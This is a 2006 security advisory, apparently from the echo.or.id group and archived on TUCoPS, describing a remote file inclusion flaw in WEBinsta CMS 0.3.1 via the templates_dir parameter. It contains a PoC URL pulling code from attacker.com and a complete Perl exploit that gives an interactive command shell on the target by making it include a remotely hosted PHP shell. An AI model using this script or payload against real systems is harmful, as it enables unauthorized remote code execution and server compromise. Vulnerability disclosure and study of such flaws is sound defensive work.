ECHO_ADV_45$2006=0D
=0D
-----------------------------------------------------------------------------------------=0D
[ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability=0D
-----------------------------------------------------------------------------------------=0D
=0D
Author        : M.Hasran Addahroni=0D
Date           : Aug, 12th 2006=0D
Location      : Australia, Sydney=0D
Web : http://advisories.echo.or.id/adv/adv45-K-159-2006.txt=0D 
Critical Lvl   : Dangerous=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Application : WEBinsta CMS =0D
version      : 0.3.1=0D
URL : http://www.webinsta.com/ =0D 
                  https://sourceforge.net/projects/webinsta/=0D
http://atomo64.puffinhost.com/page/webinsta_cms.html=0D 
Description :=0D
=0D
WEBinsta CMS provides a dynamic website building solution for small buisness and =0D
indivisuals who want to make their web presence felt. It provides a powerful =0D
system for people who doesn't know nothing about html or PHP.=0D
Webinsta CMS is not longer supported by the Webinsta Team, now atomo64 =0D
the only active developer and he's going to continue with it's development.=0D
The new CMS name is InWeb CMS =0D
=0D
---------------------------------------------------------------------------=0D
=0D
Proof of Concept:=0D
~~~~~~~~~~~~~~~=0D
Vulnerable Script: index.php .=0D
=0D
---------------index.php--------------------------------=0D
...=0D
$tp_main=new bTemplate();=0D
$tp_temp=new bTemplate();=0D
=0D
include("code/processmods.php");=0D
/*Read the block definition and the number*/=0D
include($templates_dir."template.def.php");=0D
/*administration panel and editing settings */=0D
$show_edit=false;=0D
...=0D
------------------------------------------------------------------=0D
=0D
Variables $templates_dir are not properly sanitized.=0D
When register_globals=on and allow_fopenurl=on an attacker can =0D
exploit this vulnerability with a simple php injection script.=0D
=0D
Poc/Exploit:=0D
~~~~~~~~~~~=0D
=0D
http://www.target.com/[webinstacms_path]/index.php?templates_dir=http://attacker.com/evil?=0D 
=0D
Solution:=0D
~~~~~~~~=0D
=0D
use the latest version=0D
=0D
Notification:=0D
~~~~~~~~~~~=0D
=0D
 vendor not contact yet=0D
=0D
---------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~~=0D
~ ping - my dearest wife, for all the luv the tears n the breath=0D
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative,kaiten=0D
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw=0D
~ SinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit, x16=0D
~ newbie_hacker@yahoogroups.com=0D 
~ #aikmel #e-c-h-o @irc.dal.net=0D 
=0D
---------------------------------------------------------------------------=0D
Contact:=0D
~~~~~~~=0D
=0D
     K-159 || echo|staff || eufrato[at]gmail[dot]com=0D
Homepage: http://k-159.echo.or.id/=0D 
=0D
-------------------------------- [ EOF ] ----------------------------------=0D
=0D
Perl Exploit:=0D
~~~~~~~~~~~=0D
=0D
#!/usr/bin/perl=0D
##=0D
# WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Exploit=0D
# Bug Found & code By K-159 =0D
##=0D
# echo.or.id (c) 2006=0D
# =0D
##=0D
# usage:=0D
# perl WEBinsta.pl   =0D
#=0D
# perl WEBinsta.pl http://target.com/ http://site.com/cmd.txt cmd=0D 
#=0D
# cmd shell example: =0D
#=0D
# cmd shell variable: ($_GET[cmd]);=0D
##=0D
# #=0D
#Greetz: My Dearest Wife - ping, =0D
#echo|staff (y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative),=0D
#SinChan, sakitjiwa, maSter-oP, mr_ny3m, bithedz, lieur-euy, x16, mbahngarso, etc=0D
# =0D
# Contact: www.echo.or.id #e-c-h-o @irc.dal.net=0D 
##=0D
=0D
use LWP::UserAgent;=0D
=0D
$Path = $ARGV[0];=0D
$Pathtocmd = $ARGV[1];=0D
$cmdv = $ARGV[2];=0D
=0D
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}=0D
=0D
head();=0D
=0D
while()=0D
{=0D
       print "[shell] \$";=0D
while()=0D
       {=0D
               $cmd=$_;=0D
               chomp($cmd);=0D
=0D
$xpl = LWP::UserAgent->new() or die;=0D
$req = HTTP::Request->new(GET =>$Path.'index.php?templates_dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";=0D
=0D
$res = $xpl->request($req);=0D
$return = $res->content;=0D
$return =~ tr/[\n]/[�ƒ.�‚=AA]/;=0D
=0D
if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}=0D
=0D
elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)=0D
       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}=0D
elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}=0D
=0D
if($return =~ /(.*)/)=0D
=0D
=0D
{=0D
       $finreturn = $1;=0D
       $finreturn=~ tr/[�ƒ.�‚=AA]/[\n]/;=0D
       print "\r\n$finreturn\n\r";=0D
       last;=0D
}=0D
=0D
else {print "[shell] \$";}}}last;=0D
=0D
sub head()=0D
 {=0D
 print "\n============================================================================\r\n";=0D
 print " *WEBinsta CMS 0.3.1 templates_dir Remote File Inclusion Exploit*\r\n";=0D
 print "============================================================================\r\n";=0D
 }=0D
sub usage()=0D
 {=0D
 head();=0D
 print " Usage: perl WEBinsta.pl   \r\n\n";=0D
print "  - Full path to WEBinsta CMS ex: http://www.site.com/ \r\n";=0D 
print "  - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";=0D 
 print "  - Command variable used in php shell \r\n";=0D
 print "============================================================================\r\n";=0D
 print "                           Bug Found by K-159 \r\n";=0D
print " www.echo.or.id #e-c-h-o irc.dal.net 2006 \r\n";=0D 
 print "============================================================================\r\n";=0D
 exit();=0D
 }

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2024 AOH